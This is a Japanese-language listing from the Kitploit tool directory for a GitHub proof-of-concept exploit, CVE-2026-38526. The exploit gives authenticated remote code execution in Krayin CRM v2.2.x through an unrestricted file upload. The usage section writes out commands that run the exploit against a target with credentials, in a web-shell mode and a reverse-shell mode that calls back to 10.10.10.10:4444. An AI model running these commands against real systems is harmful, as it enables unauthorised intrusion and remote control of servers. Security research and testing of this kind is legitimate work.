Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-38526 — Krayin CRM v2.2.xにおける無制限ファイルアップロードを介した認証済みリモートコード実行の概念実証エクスプロイト。Webシェルおよびリバースシェルのペイロードをサポート。 | Kitploit
ツール/GitHubGitHub/qurclinc/cve-2026-38526
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubqurclinc/cve-2026-38526

CVE-2026-38526

Krayin CRM v2.2.xにおける無制限ファイルアップロードを介した認証済みリモートコード実行の概念実証エクスプロイト。Webシェルおよびリバースシェルのペイロードをサポート。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-38526 - Krayin CRM RCE

説明

Krayin CRM v2.2.x における重大な脆弱性の PoC スクリプト。ファイルアップロードの制限がないことを利用した認証済み RCE を許可します。

使用方法

root@kitploit:~
# Web シェル
python3 exploit.py -u http://target.com -e [email protected] -p password123

# リバースシェル
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444

必要条件

  • Python 3.8+
  • requests, bs4

免責事項

教育目的のみで使用してください。

参照

  • https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38526/poc.md
ツールをダウンロード